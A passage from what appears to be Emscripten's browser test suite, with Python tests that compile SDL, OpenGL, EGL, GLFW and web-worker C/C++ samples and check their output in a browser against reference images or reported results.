self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
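# Note: FS.createLazyFile in the pre-js above maps /bigfile onto a URL served by the
# helper server started below, so reads from the worker are satisfied with synchronous
# XHRs (kept small via -s SMALL_XHR_CHUNKS=1), which is what this test exercises.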
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception:
print('(sleep for server)')
time.sleep(1)
else:
# the loop never hit `break`, i.e. the server did not become ready in time
raise Exception('chunked XHR test server did not start up in time')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that processes have released their file
# locks and the test tearDown won't attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
self.emcc_args += ['-Wno-pointer-sign', '-Wno-int-conversion']
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS=1', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
